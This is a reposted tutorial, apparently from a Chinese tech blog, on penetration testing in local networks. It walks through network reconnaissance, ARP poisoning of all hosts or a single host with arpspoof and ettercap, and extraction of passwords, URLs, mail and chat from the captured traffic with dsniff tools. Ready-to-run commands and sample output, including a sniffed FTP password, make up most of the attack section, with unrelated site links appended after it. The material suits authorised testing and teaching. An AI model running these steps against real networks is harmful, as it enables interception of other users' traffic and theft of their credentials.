Pentesting In Local Networks [Unix]

简介:
 

---------------------------------------

| Team ph0x90bic proudly presents | | Pentesting in Local Networks Part 1 | | Reconaissance and ARP Poisoning | --------------------------------------- INTRODUCTION This paper describes standard Reconaissance, ARP-Poisoning and traffic analysis technics with dsniff, ettercap and netdiscover on local networks. You find all needed tools preinstalled on nodezero linux. Tools needed: * netdiscover (Search for hosts on local network) * tcpdump/tshark (Sniff network traffic) * dsniff/ettercap (Launch ARP-Poisoning and analyze pcap files) --- CHECK LOCAL NETWORK CONFIGURATION First check your local network configuration to gain information about the local network you are connected. # sudo ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:18308 errors:0 dropped:0 overruns:0 frame:0 TX packets:18308 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:9599453 (9.5 MB) TX bytes:9599453 (9.5 MB) wlan0 Link encap:Ethernet HWaddr 90:4c:e5:a5:9c:2b inet addr:10.0.0.1 Bcast:10.0.0.255 Mask:255.255.255.0 inet6 addr: fe80::924c:e5ff:fea5:9c2b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:32320 errors:0 dropped:0 overruns:0 frame:0 TX packets:30280 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:21141126 (21.1 MB) TX bytes:16626291 (16.6 MB) # sudo route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 10.0.0.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlan0 0.0.0.0 10.0.0.254 0.0.0.0 UG 0 0 0 wlan0 RESULTS Ownipv4: 10.0.0.1 Ownipv6: fe80::924c:e5ff:fea5:9c2b/64 Gateway: 10.0.0.254 Netmask: 255.255.255.0 Network: 10.0.0.0/24 Interface: wlan0 --- COLLECT PASSIVE INFORMATION You can collect information without sending network traffic by sniffing the network traffic with tshark or tcpdump. Netdiscover lists you the alive hosts in realtime and shows you the MAC Vendor. # sudo tshark -n -i wlan0 -w netlog.pcap not src 10.0.0.1 & # sudo tshark -n -i wlan0 not src 10.0.0.1 # sudo tcpdump -n -i wlan0 -w netlog.pcap not src 10.0.0.1 & # sudo tcpdump -n -i wlan0 not src 10.0.0.1 # sudo netdiscover -p -i wlan0 --- SNIPPED TCPDUMP OUTPUT START --- ... 16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28 16:43:46.888905 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28 16:43:46.889431 ARP, Request who-has 10.0.0.3 tell 10.0.0.254, length 28 16:43:46.891183 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28 ... --- SNIPPED TCPDUMP OUTPUT END --- --- NETDISCOVER OUTPUT START --- Currently scanning: (passive) | Screen View: Unique Hosts 174 Captured ARP Req/Rep packets, from 5 hosts. Total size: 7344 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 10.0.0.254 00:1f:9f:e9:1e:a6 157 6594 Thomson Telecom Belgium 10.0.0.3 00:24:21:ba:04:bd 02 120 Unknown vendor 10.0.0.2 00:18:de:60:9f:7d 02 084 Intel Corporation 0.0.0.0 00:18:de:60:9f:7d 03 126 Intel Corporation 10.0.0.4 00:90:4b:94:2d:0d 10 420 GemTek Technology Co., Ltd. --- NETDISCOVER OUTPUT END --- RESULTS Hosts: 10.0.0.2 (00:18:de:60:9f:7d) 10.0.0.3 (00:24:21:ba:04:bd) 10.0.0.4 (00:90:4b:94:2d:0d) --- ARPSPOOFING ALL HOSTS You can arpspoof all hosts on the local network. This is dangerous in large networks, because it increases network performance. But in small networks spoofing all hosts is possible without any problems. # sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1 # sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1 # sudo arpspoof -i wlan0 10.0.0.254 # sudo ettercap -TQM arp:remote -i wlan0 // /10.0.0.254/ RESULTS Sniffed traffic from all hosts on network as pcap file in landump.pcap --- ARPSPOOF SPECIFIC HOST On larger networks use this attack to arpspoof a specific host only. # sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1 # sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1 # sudo arpspoof -i wlan0 -t 10.0.0.2 10.0.0.254 # sudo ettercap -TQM arp:remote -i wlan0 /10.0.0.2/ /10.0.0.254/ RESULTS Sniffed traffic from 10.0.0.2 only as pcap file in landump.pcap --- DSNIFF You can analyze pcap files easily with the dsniff tools or manually with string, grep or similar tools. # sudo dsniff -n -p landump.pcap (Passwords) # sudo urlsnarf -n -p landump.pcap (HTTP Requests) # sudo filesnarf -n -p landump.pcap (NFS Files) # sudo mailsnarf -n -p landump.pcap (SMTP/POP mails) # sudo msgsnarf -n -p landump.pcap (Chat messages) # sudo strings landump.pcap | grep -i 'yourstring' (Manual analysis) --- DSNIFF OUTPUT START --- 03/18/11 20:48:12 tcp 10.0.0.2.50222 -> openbsd.sunsite.ualberta.ca.21 (ftp) USER anonymous PASS SUPERGEHEIM --- DSNIFF OUTPUT END --- RESULTS Cleartext information in sniffed pcap traffic.

---












本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/601442,如需转载请自行联系原作者

相关文章
|
3天前
|
弹性计算 关系型数据库 微服务
基于 Docker 与 Kubernetes(K3s)的微服务:阿里云生产环境扩容实践
在微服务架构中,如何实现“稳定扩容”与“成本可控”是企业面临的核心挑战。本文结合 Python FastAPI 微服务实战,详解如何基于阿里云基础设施,利用 Docker 封装服务、K3s 实现容器编排,构建生产级微服务架构。内容涵盖容器构建、集群部署、自动扩缩容、可观测性等关键环节,适配阿里云资源特性与服务生态,助力企业打造低成本、高可靠、易扩展的微服务解决方案。
1091 0
|
12天前
|
人工智能 运维 安全
|
2天前
|
机器学习/深度学习 人工智能 前端开发
通义DeepResearch全面开源!同步分享可落地的高阶Agent构建方法论
通义研究团队开源发布通义 DeepResearch —— 首个在性能上可与 OpenAI DeepResearch 相媲美、并在多项权威基准测试中取得领先表现的全开源 Web Agent。
382 8
|
10天前
|
人工智能 测试技术 API
智能体(AI Agent)搭建全攻略:从概念到实践的终极指南
在人工智能浪潮中,智能体(AI Agent)正成为变革性技术。它们具备自主决策、环境感知、任务执行等能力,广泛应用于日常任务与商业流程。本文详解智能体概念、架构及七步搭建指南,助你打造专属智能体,迎接智能自动化新时代。
|
3天前
|
弹性计算 Kubernetes jenkins
如何在 ECS/EKS 集群中有效使用 Jenkins
本文探讨了如何将 Jenkins 与 AWS ECS 和 EKS 集群集成,以构建高效、灵活且具备自动扩缩容能力的 CI/CD 流水线,提升软件交付效率并优化资源成本。
276 0
|
10天前
|
人工智能 异构计算
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
|
11天前
|
机器学习/深度学习 人工智能 自然语言处理
B站开源IndexTTS2,用极致表现力颠覆听觉体验
在语音合成技术不断演进的背景下,早期版本的IndexTTS虽然在多场景应用中展现出良好的表现,但在情感表达的细腻度与时长控制的精准性方面仍存在提升空间。为了解决这些问题,并进一步推动零样本语音合成在实际场景中的落地能力,B站语音团队对模型架构与训练策略进行了深度优化,推出了全新一代语音合成模型——IndexTTS2 。
778 23
|
3天前
|
缓存 供应链 监控
VVIC seller_search 排行榜搜索接口深度分析及 Python 实现
VVIC搜款网seller_search接口提供服装批发市场的商品及商家排行榜数据,涵盖热销榜、销量排名、类目趋势等,支持多维度筛选与数据分析,助力选品决策、竞品分析与市场预测,为服装供应链提供有力数据支撑。
|
3天前
|
缓存 监控 API
Amazon item_review 商品评论接口深度分析及 Python 实现
亚马逊商品评论接口(item_review)可获取用户评分、评论内容及时间等数据,支持多维度筛选与分页调用,结合Python实现情感分析、关键词提取与可视化,助力竞品分析、产品优化与市场决策。